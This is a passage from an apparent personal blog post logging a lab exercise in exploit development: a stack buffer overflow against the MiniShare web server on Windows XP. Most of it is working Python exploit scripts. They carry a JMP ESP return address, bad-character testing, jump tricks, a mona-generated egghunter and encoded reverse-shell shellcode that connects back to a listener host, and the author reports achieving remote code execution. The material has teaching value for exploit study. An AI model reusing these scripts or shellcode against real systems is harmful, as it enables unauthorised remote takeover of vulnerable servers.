Worked like a charm. So there is definitely an issue if the shellcode comes before 1787. Let's double check. Initially, I create the bad character set after the 1787 and there was only a problem with "0d". Now I have created the bad character buffer where I placed the shellcode before which is before the 1877. Maybe this will give me the bad characters. It is weird however, that it does not mangle the characters later in the buffer.
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
# windows/shell/reverse_tcp LHOST=192.168.150.119 LPORT=80 R
# 255
badchar=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "\x41" * 1096 + "\x90" * 50 + badchar+ "\x41" * 386 + "\x53\x93\x42\x7E" + "\xe9\x44\xFD\xFF\xFF" + "\x42" * 1204buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
I am still not seeing a mangled bad character, but maybe there is something wrong with the negative jump. What if I change the jump to a 4 byte jump and see if it lands at the interrupt code, "\xCC".
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
# windows/shell/reverse_tcp LHOST=192.168.150.119 LPORT=80 R
# 255
badchar=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "\x41" * 1095 + "\x90" * 50 + badchar+ "\xCC" * 387 + "\x53\x93\x42\x7E" + "\xeb\xF1\xFF\xFF" + "\x42" * 1205
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
Looks like that worked. I backed up about 15 characters from the jump. [0 - 15 = -15. Converted to hex = FF...F1]. I think I need to step back at the testing and changes. I have tested the badchars on both sides of the buffer and it only mangles "0d". I have jumped back "short" and "near". The negative jumps all work. So why can't I get a shell back. It is around this time, I tried changing the encoding of the shellcode. I
also started excluding more characters like "fe", "8f" and "c6". I was still getting the same result.
Ok. This is just confusing. What if I use an egghunter to put the shellcode anywhere? Will it still give the same result?? Sidenote, I currently have a different IP address so I will just redo the lhost for the shellcode. I used the egghunter generator functionality in Mona in ImmuntyDebugger:
Output generated by mona.py v2.0, rev 374 - Immunity Debugger
Corelan Team - https://www.corelan.be
================================================================================
OS : xp, release 5.1.2600
Process being debugged : minishare (pid 2868)
================================================================================
2013-02-26 10:52:23
================================================================================
Egghunter , tag G00N :
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x47\x30\x30\x4e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Put this tag in front of your shellcode : G00NG00N
The new script is now:
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.150.170 LPORT=55555 R | msfencode -b '\0x00\0x0a\0x0d\0x20' -t c -e x86/shikata_ga_nai
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
# Egghunter , tag G00N :
# 32 bytes
# Output generated by mona.py v2.0, rev 374 - Immunity Debugger
egghunter=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x47\x30\x30\x4e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Put this tag in front of your shellcode : G00NG00N
egg=("G00NG00N")
sc=("\xbe\xb8\x9b\xda\x1f\xdb\xc4\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x4f\x31\x77\x14\x03\x77\x14\x83\xc7\x04\x5a\x6e\x26\xf7\x13"
"\x91\xd7\x08\x43\x1b\x32\x39\x51\x7f\x36\x68\x65\x0b\x1a\x81"
"\x0e\x59\x8f\x12\x62\x76\xa0\x93\xc8\xa0\x8f\x24\xfd\x6c\x43"
"\xe6\x9c\x10\x9e\x3b\x7e\x28\x51\x4e\x7f\x6d\x8c\xa1\x2d\x26"
"\xda\x10\xc1\x43\x9e\xa8\xe0\x83\x94\x91\x9a\xa6\x6b\x65\x10"
"\xa8\xbb\xd6\x2f\xe2\x23\x5c\x77\xd3\x52\xb1\x64\x2f\x1c\xbe"
"\x5e\xdb\x9f\x16\xaf\x24\xae\x56\x63\x1b\x1e\x5b\x7a\x5b\x99"
"\x84\x09\x97\xd9\x39\x09\x6c\xa3\xe5\x9c\x71\x03\x6d\x06\x52"
"\xb5\xa2\xd0\x11\xb9\x0f\x97\x7e\xde\x8e\x74\xf5\xda\x1b\x7b"
"\xda\x6a\x5f\x5f\xfe\x37\x3b\xfe\xa7\x9d\xea\xff\xb8\x7a\x52"
"\xa5\xb3\x69\x87\xdf\x99\xe5\x64\xed\x21\xf6\xe2\x66\x51\xc4"
"\xad\xdc\xfd\x64\x25\xfa\xfa\x8b\x1c\xba\x95\x75\x9f\xba\xbc"
"\xb1\xcb\xea\xd6\x10\x74\x61\x27\x9c\xa1\x25\x77\x32\x1a\x85"
"\x27\xf2\xca\x6d\x22\xfd\x35\x8d\x4d\xd7\x43\x8a\xda\x18\xfb"
"\x82\xb1\xf1\xfe\xaa\x1c\x02\x76\x4c\xf4\x15\xde\xc7\x61\x8f"
"\x7b\x93\x10\x50\x56\x33\xb0\xc3\x3d\xc3\xbf\xff\xe9\x94\xe8"
"\xce\xe3\x70\x05\x68\x5a\x66\xd4\xec\xa5\x22\x03\xcd\x28\xab"
"\xc6\x69\x0f\xbb\x1e\x71\x0b\xef\xce\x24\xc5\x59\xa9\x9e\xa7"
"\x33\x63\x4c\x6e\xd3\xf2\xbe\xb1\xa5\xfa\xea\x47\x49\x4a\x43"
"\x1e\x76\x63\x03\x96\x0f\x99\xb3\x59\xda\x19\xc3\x13\x46\x0b"
"\x4c\xfa\x13\x09\x11\xfd\xce\x4e\x2c\x7e\xfa\x2e\xcb\x9e\x8f"
"\x2b\x97\x18\x7c\x46\x88\xcc\x82\xf5\xa9\xc4")
buffer = "\x41" * 92 + egg + sc + "\x41" * 1346 + "\x53\x93\x42\x7E" + "\x90" * 10 + egghunter + "\x42" * 1167
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
Now, the egghunter works! The shellcode is in the beginning of the buffer. So is it later down the buffer, but before the "ESP" jump that causes a problem??
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.150.170 LPORT=55555 R | msfencode -b '\0x00\0x0a\0x0d\0x20' -t c -e x86/shikata_ga_nai
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
# Egghunter , tag G00N :
# 32 bytes
# Output generated by mona.py v2.0, rev 374 - Immunity Debugger
egghunter=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x47\x30\x30\x4e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Put this tag in front of your shellcode : G00NG00N
egg=("G00NG00N")
sc=("\xbe\xb8\x9b\xda\x1f\xdb\xc4\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x4f\x31\x77\x14\x03\x77\x14\x83\xc7\x04\x5a\x6e\x26\xf7\x13"
"\x91\xd7\x08\x43\x1b\x32\x39\x51\x7f\x36\x68\x65\x0b\x1a\x81"
"\x0e\x59\x8f\x12\x62\x76\xa0\x93\xc8\xa0\x8f\x24\xfd\x6c\x43"
"\xe6\x9c\x10\x9e\x3b\x7e\x28\x51\x4e\x7f\x6d\x8c\xa1\x2d\x26"
"\xda\x10\xc1\x43\x9e\xa8\xe0\x83\x94\x91\x9a\xa6\x6b\x65\x10"
"\xa8\xbb\xd6\x2f\xe2\x23\x5c\x77\xd3\x52\xb1\x64\x2f\x1c\xbe"
"\x5e\xdb\x9f\x16\xaf\x24\xae\x56\x63\x1b\x1e\x5b\x7a\x5b\x99"
"\x84\x09\x97\xd9\x39\x09\x6c\xa3\xe5\x9c\x71\x03\x6d\x06\x52"
"\xb5\xa2\xd0\x11\xb9\x0f\x97\x7e\xde\x8e\x74\xf5\xda\x1b\x7b"
"\xda\x6a\x5f\x5f\xfe\x37\x3b\xfe\xa7\x9d\xea\xff\xb8\x7a\x52"
"\xa5\xb3\x69\x87\xdf\x99\xe5\x64\xed\x21\xf6\xe2\x66\x51\xc4"
"\xad\xdc\xfd\x64\x25\xfa\xfa\x8b\x1c\xba\x95\x75\x9f\xba\xbc"
"\xb1\xcb\xea\xd6\x10\x74\x61\x27\x9c\xa1\x25\x77\x32\x1a\x85"
"\x27\xf2\xca\x6d\x22\xfd\x35\x8d\x4d\xd7\x43\x8a\xda\x18\xfb"
"\x82\xb1\xf1\xfe\xaa\x1c\x02\x76\x4c\xf4\x15\xde\xc7\x61\x8f"
"\x7b\x93\x10\x50\x56\x33\xb0\xc3\x3d\xc3\xbf\xff\xe9\x94\xe8"
"\xce\xe3\x70\x05\x68\x5a\x66\xd4\xec\xa5\x22\x03\xcd\x28\xab"
"\xc6\x69\x0f\xbb\x1e\x71\x0b\xef\xce\x24\xc5\x59\xa9\x9e\xa7"
"\x33\x63\x4c\x6e\xd3\xf2\xbe\xb1\xa5\xfa\xea\x47\x49\x4a\x43"
"\x1e\x76\x63\x03\x96\x0f\x99\xb3\x59\xda\x19\xc3\x13\x46\x0b"
"\x4c\xfa\x13\x09\x11\xfd\xce\x4e\x2c\x7e\xfa\x2e\xcb\x9e\x8f"
"\x2b\x97\x18\x7c\x46\x88\xcc\x82\xf5\xa9\xc4")
buffer = "\x41" * 1346 + egg + sc + "\x41" * 92 + "\x53\x93\x42\x7E" + "\x90" * 10 + egghunter + "\x42" * 1167
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
That also works for remote code execution. So I have a feeling that using the negative jump is causing the problem. However, it is possible to "jump" back to the beginning of the buffer by using an egghunter. I have a feeling that if I tried manipulating the ESP register, I could have gone backwards to an earlier spot in the buffer. I have not tried it yet however. This was a good exercise. I have not really had time to work on buffer overflows and look at my OffSec "Cracking the Perimeter" notes in a while.
No comments:
Post a Comment